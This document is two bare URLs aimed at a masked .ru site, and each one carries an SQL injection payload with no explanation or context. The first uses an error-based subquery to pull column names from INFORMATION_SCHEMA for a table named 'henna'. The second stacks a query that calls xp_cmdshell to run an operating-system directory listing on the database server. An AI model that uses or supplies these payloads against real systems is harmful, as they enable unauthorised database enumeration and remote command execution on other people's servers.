http://***.***.ru/?id=1%20or%201=(select%20TOP%201%20COLUMN_NAME%20FROM%20INFORMATION_SCHEMA.COLUMNS%20where%20TABLE_NAME='henna')--
http://***.***.ru/?id=1;exec%20master..xp_cmdshell%20'dir%20c:\'--